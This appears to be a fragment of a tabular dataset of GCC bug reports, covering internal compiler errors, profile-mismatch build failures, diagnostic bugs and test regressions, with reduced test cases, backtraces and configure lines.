/work/mhargett/gcc-trunk-obj/./prev-gcc/g++ -B/work/mhargett/gcc-trunk-obj/./prev-gcc/ -B/u/mhargett/x86_64-unknown-linux-gnu/bin/ -nostdinc++ -B/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -I/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include -I/work/mhargett/gcc-trunk/libstdc++-v3/libsupc++ -L/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -c   -g -O2 -fprofile-use -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-trunk/gcc -I../../gcc-trunk/gcc/. -I../../gcc-trunk/gcc/../include -I../../gcc-trunk/gcc/../libcpp/include -I/u/mhargett//include -I/u/mhargett//include -I/u/mhargett/include  -I../../gcc-trunk/gcc/../libdecnumber -I../../gcc-trunk/gcc/../libdecnumber/bid -I../libdecnumber -I../../gcc-trunk/gcc/../libbacktrace -DCLOOG_INT_GMP -I/u/mhargett//include -I/u/mhargett/include  ../../gcc-trunk/gcc/cgraph.c -o cgraph.o
In file included from ../../gcc-trunk/gcc/symtab.c:782:0:
./gt-symtab.h: In function â€˜bool symtab_used_from_object_file_p(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z30symtab_used_from_object_file_pP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
 }
  ^
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜bool resolution_used_from_other_file_p(ld_plugin_symbol_resolution)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z33resolution_used_from_other_file_p27ld_plugin_symbol_resolutionâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void verify_symtab()â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z13verify_symtabvâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void verify_symtab_node(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z18verify_symtab_nodeP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜bool verify_symtab_base(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z18verify_symtab_baseP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void debug_symtab()â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z12debug_symtabvâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void debug_symtab_node(symtab_node)â€™:
./gt-symtab.h:40:2: error: source locations for function â€˜_Z17debug_symtab_nodeP15symtab_node_defâ€™ have changed the profile data may be out of date [-Werror]
./gt-symtab.h: In function â€˜void dump_symtab(FILE*)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z11dump_symtabP8_IO_FILEâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void dump_symtab_node(FILE* symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z16dump_symtab_nodeP8_IO_FILEP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void dump_symtab_base(FILE* symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z16dump_symtab_baseP8_IO_FILEP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜const char* symtab_node_name(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z16symtab_node_nameP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z16symtab_node_nameP15symtab_node_defâ€™ does not match its profile data (counter â€˜indirect_callâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜const char* symtab_node_asm_name(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z20symtab_node_asm_nameP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z20symtab_node_asm_nameP15symtab_node_defâ€™ does not match its profile data (counter â€˜indirect_callâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_dissolve_same_comdat_group_list(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z38symtab_dissolve_same_comdat_group_listP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_add_to_same_comdat_group(symtab_node symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z31symtab_add_to_same_comdat_groupP15symtab_node_defS0_â€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void change_decl_assembler_name(tree tree)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z26change_decl_assembler_nameP9tree_nodeS0_â€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜symtab_node_def* symtab_node_for_asm(const_tree)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z19symtab_node_for_asmPK9tree_nodeâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_initialize_asm_name_hash()â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z31symtab_initialize_asm_name_hashvâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_remove_node(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z18symtab_remove_nodeP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜symtab_node_def* symtab_get_node(const_tree)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z15symtab_get_nodePK9tree_nodeâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_unregister_node(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z22symtab_unregister_nodeP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_insert_node_to_hashtable(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z31symtab_insert_node_to_hashtableP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_register_node(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z20symtab_register_nodeP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void symtab_prevail_in_asm_name_hash(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_Z31symtab_prevail_in_asm_name_hashP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void unlink_from_assembler_name_hash(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_ZL31unlink_from_assembler_name_hashP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜void insert_to_assembler_name_hash(symtab_node)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_ZL29insert_to_assembler_name_hashP15symtab_node_defâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜int eq_assembler_name(const void* const void*)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_ZL17eq_assembler_namePKvS0_â€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜hashval_t hash_node_by_assembler_name(const void*)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_ZL27hash_node_by_assembler_namePKvâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
./gt-symtab.h: In function â€˜int eq_node(const void* const void*)â€™:
./gt-symtab.h:40:2: error: source locations for function â€˜_ZL7eq_nodePKvS0_â€™ have changed the profile data may be out of date [-Werror]
./gt-symtab.h: In function â€˜hashval_t hash_node(const void*)â€™:
./gt-symtab.h:40:2: error: the control flow of function â€˜_ZL9hash_nodePKvâ€™ does not match its profile data (counter â€˜arcsâ€™) [-Werror=coverage-mismatch]
./gt-symtab.h:40:2: note: use -Wno-error=coverage-mismatch to tolerate the mismatch but performance may drop if the function is hot
cc1plus: all warnings being treated as errors
make[3]: *** [symtab.o] Error 1</t>
  </si>
  <si>
    <t>GCC-18845</t>
  </si>
  <si>
    <t>Illegal program not detected RM 4.7(3)</t>
  </si>
  <si>
    <t>(Debian bug #284332)
-- RM 4.7(3):  The operand [of a qualified expression] shall resolve
-- to be of the type determined by the subtype_mark...
-- see AI-332 (not yet approved).
procedure Test_134 is
   type T1 is tagged null record
   procedure p3 (x1: T1) is
   begin
      null
   end
   x2: T1'class := T1'(null record)
   x3: T1'class := T1'(x2)     -- ERROR: T1 not same type as T1'class
begin
   p3(x1 =&gt; T1'(x2))           -- ERROR: T1 not same type as T1'class
end Test_134
The expected output from gnat is:
test_134.adb:15:23: expected type T1
test_134.adb:15:23: found type T1'Class
test_134.adb:17:16: expected type T1
test_134.adb:17:16: found type T1'Class
gnatmake: test_134.adb compilation error
Instead the compiler is silent.</t>
  </si>
  <si>
    <t>GCC-60312</t>
  </si>
  <si>
    <t>[4.9 Regression] [c++1y] ICE using auto as template parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++1y) triggers an
ICE on trunk:
==================================
template struct A
template struct A
{
  template void foo()
}
void bar()
{
  A().foo()
}
==================================
bug.cc: In substitution of 'template &gt; void A::foo() [with int  = 0]':
bug.cc:10:20:   required from here
bug.cc:5:22: internal compiler error: in tsubst at cp/pt.c:11554
   template void foo()
                      ^
0x621ff5 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11554
0x62cb32 tsubst_template_args
        ../../gcc/gcc/cp/pt.c:9837
0x62d5c3 tsubst_aggr_type
        ../../gcc/gcc/cp/pt.c:10034
0x61f961 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11445
0x61f1cb tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11435
0x62b376 tsubst_arg_types
        ../../gcc/gcc/cp/pt.c:11091
0x62b77b tsubst_function_type
        ../../gcc/gcc/cp/pt.c:11190
0x61f85a tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc/gcc/cp/pt.c:11903
0x646550 fn_type_unification(tree_node* tree_node* tree_node* tree_node* const* unsigned int tree_node* unification_kind_t int bool bool)
        ../../gcc/gcc/cp/pt.c:15633
0x5b1941 add_template_candidate_real
        ../../gcc/gcc/cp/call.c:2974
0x5ad5ec add_template_candidate
        ../../gcc/gcc/cp/call.c:3071
0x5ad5ec add_candidates
        ../../gcc/gcc/cp/call.c:5132
0x5b71ae build_new_method_call_1
        ../../gcc/gcc/cp/call.c:7772
0x5b71ae build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
        ../../gcc/gcc/cp/call.c:7958
0x6b6f09 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:6135
0x6b9286 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x6b9faf cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x6ba4a1 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x6bc854 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8274
0x6bd08c cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8313
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-71807</t>
  </si>
  <si>
    <t>[5/6/7 Regression] Internal compiler error with NULL() reference in structure constructor</t>
  </si>
  <si>
    <t>The following snippet when compiled with gfortran recent trunk (r238061) or 6.1.1 results in an internal compiler error.
~~
MODULE fold_convert_loc_ice
  IMPLICIT NONE
  PRIVATE
  TYPE PUBLIC :: ta
    PRIVATE
    INTEGER :: a_comp
  END TYPE ta
  TYPE PUBLIC :: tb
    TYPE(ta) ALLOCATABLE :: b_comp
  END TYPE tb
CONTAINS
  SUBROUTINE proc
    TYPE(tb) :: b
    b = tb(null())
  END SUBROUTINE proc
END MODULE fold_convert_loc_ice
~~
$ gfortran -c -v fold_convert_loc_ice.f90
Using built-in specs.
COLLECT_GCC=gfortran
Target: x86_64-pc-linux-gnu
Configured with: .././src/configure --prefix=/home/MEGMS2/ian/usr/gcc-7.0.0 --enable-languages=cc++fortran --enable-libgomp --enable-checking=release
Thread model: posix
gcc version 7.0.0 20160706 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-c' '-v' '-mtune=generic' '-march=x86-64'
 /home/MEGMS2/ian/usr/gcc-7.0.0/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/f951 fold_convert_loc_ice.f90 -quiet -dumpbase fold_convert_loc_ice.f90 -mtune=generic -march=x86-64 -auxbase fold_convert_loc_ice -version -fintrinsic-modules-path /home/MEGMS2/ian/usr/gcc-7.0.0/lib/gcc/x86_64-pc-linux-gnu/7.0.0/finclude -o /tmp/cc3kuTzv.s
GNU Fortran (GCC) version 7.0.0 20160706 (experimental) (x86_64-pc-linux-gnu)
        compiled by GNU C version 7.0.0 20160704 (experimental) GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.2 isl version none
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran2008 (GCC) version 7.0.0 20160706 (experimental) (x86_64-pc-linux-gnu)
        compiled by GNU C version 7.0.0 20160704 (experimental) GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.2 isl version none
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
fold_convert_loc_ice.f90:17:0:
     b = tb(null())
internal compiler error: in fold_convert_loc at fold-const.c:2371
0x833153 fold_convert_loc(unsigned int tree_node* tree_node*)
        ../.././src/gcc/fold-const.c:2371
0x6b6e27 gfc_trans_subcomponent_assign
        ../.././src/gcc/fortran/trans-expr.c:7250
0x6b6653 gfc_trans_structure_assign(tree_node* gfc_expr* bool)
        ../.././src/gcc/fortran/trans-expr.c:7391
0x6b7dbf gfc_conv_structure(gfc_se* gfc_expr* int)
        ../.././src/gcc/fortran/trans-expr.c:7420
0x6b8e62 gfc_trans_assignment_1
        ../.././src/gcc/fortran/trans-expr.c:9317
0x682275 trans_code
        ../.././src/gcc/fortran/trans.c:1678
0x6a6019 gfc_generate_function_code(gfc_namespace*)
        ../.././src/gcc/fortran/trans-decl.c:6202
0x685a39 gfc_generate_module_code(gfc_namespace*)
        ../.././src/gcc/fortran/trans.c:2056
0x63d2eb translate_all_program_units
        ../.././src/gcc/fortran/parse.c:5873
0x63d2eb gfc_parse_file()
        ../.././src/gcc/fortran/parse.c:6092
0x67ec62 gfc_be_parse_file
        ../.././src/gcc/fortran/f95-lang.c:198
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-43164</t>
  </si>
  <si>
    <t>[4.5 Regression] ice in completely_scalarize_record at tree-sra.c:85</t>
  </si>
  <si>
    <t>regehr@john-home:~/volatile/bugs/tmp269$ current-gcc -O small.c -c
small.c: In function â€˜func_34â€™:
small.c:16:1: internal compiler error: in completely_scalarize_record at tree-sra.c:855
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
regehr@john-home:~/volatile/bugs/tmp269$ cat small.c
struct S0
{
  unsigned char f0
  int:0
}
struct S1
{
  struct S0 f0
}
struct S1 func_34 (void)
{
  struct S1 l_221 = { { 1 } }
  return l_221
}
regehr@john-home:~/volatile/bugs/tmp269$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/tmp/gcc-r157027-install/libexec/gcc/i686-pc-linux-gnu/4.5.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/tmp/gcc-r157027-install --program-prefix=r157027- --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20100224 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-78411</t>
  </si>
  <si>
    <t>[7 Regression] FAIL: gcc.target/i386/pr45685.c scan-assembler-times cmov 6</t>
  </si>
  <si>
    <t>The gcc.target/i386/pr45685.c fails on x86_64:
  https://gcc.gnu.org/ml/gcc-testresults/2016-11/msg01936.html
The first recent mention of the failure I was able to find in the gcc-regression archives is here:
  https://gcc.gnu.org/ml/gcc-regression/2015-11/msg00320.html</t>
  </si>
  <si>
    <t>GCC-51660</t>
  </si>
  <si>
    <t>ICE on function missing argument list</t>
  </si>
  <si>
    <t>g++ crashes on this (invalid) program:
struct s
{
    static int x {return 0}
}
Output:
crashes/6.cpp:3:16: warning: extended initializer lists only available with -std=c++11 or -std=gnu++11 [enabled by default]
crashes/6.cpp:3:19: error: expected primary-expression before â€˜returnâ€™
crashes/6.cpp:3:19: error: expected â€˜}â€™ before â€˜returnâ€™
crashes/6.cpp:3:19: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
How to run: g++ file.cpp
Note that this program does not cause gcc to crash if compiled as C.
Compiler version:
Using built-in specs.
COLLECT_GCC=/new-gcc/i-4.7/bin/g++
COLLECT_LTO_WRAPPER=/new-gcc/i-4.7/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../s-4.7/configure --prefix=/new-gcc/i-4.7
Thread model: posix
gcc version 4.7.0 20111223 (experimental) (GCC)</t>
  </si>
  <si>
    <t>cas43</t>
  </si>
  <si>
    <t>GCC-60570</t>
  </si>
  <si>
    <t>expression in 'elif' directive mis-diagnosed as error when group will be skipped</t>
  </si>
  <si>
    <t>Consider the following C99 program:
#if 1
int i
#elif 1/0
#endif
With gcc 4.7.3:
   gcc -c test.c
we get
   test.c:3:8: error: division by zero in #if
According to 6.10.1p5 any sequence of tokens between the #elif and the newline is valid syntax since the group for which this line is the controlling condition will be skipped yet gcc emits a divide by zero error.
(I don't know if this bug is present in later versions as 4.7.3 is the latest I have tested on.)
Seb</t>
  </si>
  <si>
    <t>seb.grindle</t>
  </si>
  <si>
    <t>GCC-60988</t>
  </si>
  <si>
    <t>transparent_union doesn't appear in the gcc manual index</t>
  </si>
  <si>
    <t>I expected to find some mention of transparent_union in the
index but did not.
See info gcc then i transparent_union RET.</t>
  </si>
  <si>
    <t>GCC-83422</t>
  </si>
  <si>
    <t>[8 Regression] ICE: in final_scan_insn at final.c:2429 after variable tracking size limit exceeded with -fvar-tracking-assignments retrying without</t>
  </si>
  <si>
    <t>Created attachment 42880
reduced testcase
Compiler output:
$ x86_64-pc-linux-gnu-gcc -O -g --param=max-vartrack-size=1 testcase.c
testcase.c: In function 'foo':
testcase.c:2:1: note: variable tracking size limit exceeded with -fvar-tracking-assignments retrying without
 foo(int i int j int k)
 ^~~
during RTL pass: final
testcase.c:5:1: internal compiler error: in final_scan_insn at final.c:2429
 }
 ^
0x9a1102 final_scan_insn(rtx_insn* _IO_FILE* int int int*)
        /repo/gcc-trunk/gcc/final.c:2429
0x9a1531 final(rtx_insn* _IO_FILE* int)
        /repo/gcc-trunk/gcc/final.c:2064
0x9a1f61 rest_of_handle_final
        /repo/gcc-trunk/gcc/final.c:4551
0x9a1f61 execute
        /repo/gcc-trunk/gcc/final.c:4625
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-trunk-255606-checking-yes-rtl-df-extra-nographite-amd64/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-255606-checking-yes-rtl-df-extra-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-255606-checking-yes-rtl-df-extra-nographite-amd64
Thread model: posix
gcc version 8.0.0 20171213 (experimental) (GCC) 
Tested revisions:
r255624 - FAIL
r255606 - FAIL
r255576 - FAIL
r255554 - OK</t>
  </si>
  <si>
    <t>GCC-32224</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in vect_analyze_operations at tree-vect-analyze.c:374</t>
  </si>
  <si>
    <t>I'm seeing the following ICE with current trunk.  This was introduced at
some point between 20070131 (works) and 20070303 (ICE).  This is on x86_64.
(sid)25015:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/gcc -c -O -ftree-vectorize gmp-export.c
gmp-export.c: In function 'gmpz_export':
gmp-export.c:4: internal compiler error: in vect_analyze_operations at tree-vect-analyze.c:374
Please submit a full bug report
Testcase:
typedef unsigned long int *mp_ptr
typedef const unsigned long int *mp_srcptr
gmpz_export (void *data)
{
  mp_srcptr zp
  int count i
  mp_ptr __dst = ((mp_ptr) data)
  mp_srcptr __src = (zp)
  for (i = 0 i &lt; count i++)
  {
    __asm__ (bswap %q0: =r (*__dst):0 (*(__src)))
    __src++
  }
}</t>
  </si>
  <si>
    <t>GCC-32341</t>
  </si>
  <si>
    <t>[4.3 Regression] undefined reference to `df_set_regs_ever_live_p'</t>
  </si>
  <si>
    <t>Here's how I configured gcc:
/n/08/rask/src/gcc/configure --target=v850-unknown-elf --disable-multilib --disable-nls --disable-gdb --with-newlib --enable-sim
GCC fails to build with this:
gcc   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -fno-common   -DHAVE_CONFIG_H  -o cc1-dummy c-lang.o stub-objc.o attribs.o c-errors.o c-lex.o c-pragma.o c-decl.o c-typeck.o c-convert.o c-aux-info.o c-common.o c-opts.o c-format.o c-semantics.o c-incpath.o cppdefault.o c-ppoutput.o c-cppbuiltin.o prefix.o c-objc-common.o c-dump.o c-pch.o c-parser.o v850-c.o c-gimplify.o tree-mudflap.o c-pretty-print.o c-omp.o dummy-checksum.o \
  main.o tree-browser.o libbackend.a ../libcpp/libcpp.a ../libdecnumber/libdecnumber.a ../libcpp/libcpp.a   ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a -lmpfr -lgmp
libbackend.a(v850.o): In function `substitute_ep_register':
/n/08/rask/src/gcc/gcc/config/v850/v850.c:1137: undefined reference to `df_set_regs_ever_live_p'
collect2: ld returned 1 exit status
make[2]: *** [cc1-dummy] Error 1
make[2]: Leaving directory `/home/rask/build/gcc-v850-unknown-elf/gcc'
make[1]: *** [all-gcc] Error 2
make[1]: Leaving directory `/home/rask/build/gcc-v850-unknown-elf'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>ccc94453</t>
  </si>
  <si>
    <t>GCC-2323</t>
  </si>
  <si>
    <t>asdfadf adsf adfadafd</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
unknown
Environment:
asdfadsf
How-To-Repeat:
asdfa</t>
  </si>
  <si>
    <t>pp_mm</t>
  </si>
  <si>
    <t>GCC-71055</t>
  </si>
  <si>
    <t>[7 Regression] FAIL: gcc.dg/torture/pr53663-1.c   -Os  execution test</t>
  </si>
  <si>
    <t>On x86 r236066 caused
FAIL: gcc.dg/torture/pr53663-1.c   -O1  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -O2  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -O3 -g  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -Os  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -O2 -flto -fno-use-linker-plugin -flto-partit
ion=none  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -O1  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -O2  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -O3 -g  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -Os  execution test
FAIL: gcc.dg/torture/pr53663-1.c   -O2 -flto -fno-use-linker-plugin -flto-partit
ion=none  execution test
with
make check-gcc RUNTESTFLAGS=dg-torture.exp=pr53663-1.c --target_board='unix{-m32\ -fpic-fpic}'</t>
  </si>
  <si>
    <t>GCC-71331</t>
  </si>
  <si>
    <t>target-tilegx: nested-function-4.c: r10 is conflict which is both in function frame and in parameter.</t>
  </si>
  <si>
    <t>Created attachment 38591
The related insns for nested-function-4.c
The nest function:
extern void abort(void)
void foo(int i)
{
  void bar(void)
  {
    if (i != 2)
      abort ()
  }
  bar()
}
int main(void)
{
  foo (2)
  return 0
}
The command:
